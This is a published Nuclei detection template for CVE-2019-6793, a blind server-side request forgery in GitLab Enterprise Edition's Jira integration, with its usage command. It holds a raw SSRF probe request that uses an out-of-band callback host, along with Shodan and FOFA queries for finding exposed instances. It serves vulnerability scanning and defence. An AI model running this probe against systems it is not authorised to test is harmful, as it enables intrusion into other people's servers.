Skip to content

GitLab Enterprise Edition - Server-Side Request Forgery

ID: CVE-2019-6793

Severity: high

Author: ritikchaddha

Tags: cve,cve2019,gitlab,enterprise,ssrf,blind

An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.

id: CVE-2019-6793
info:
name: GitLab Enterprise Edition - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: |
An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
reference:
- https://gitlab.com/gitlab-org/gitlab-foss/-/issues/50748
- https://nvd.nist.gov/vuln/detail/CVE-2019-6793
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
cvss-score: 7.0
cve-id: CVE-2019-6793
cwe-id: CWE-918
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 1
vendor: gitlab
product: gitlab
shodan-query: html:"GitLab Enterprise Edition"
fofa-query: body="GitLab Enterprise Edition"
tags: cve,cve2019,gitlab,enterprise,ssrf,blind
http:
- raw:
- |+
POST /-/jira/login/oauth/access_token HTTP/1.1
Host: {{interactsh-url}}
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
- type: word
part: body
words:
- "access_token="
- type: status
status:
- 200
# digest: 4a0a00473045022100dd74c81498e9a1897c7c04d1d0e16b7e2d654325fee62de12d84fe73977eb238022066bc69569cd17b325d68d7d90e56b85038d667b7990a3dd5b656db7231226960:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-6793.yaml"

View on Github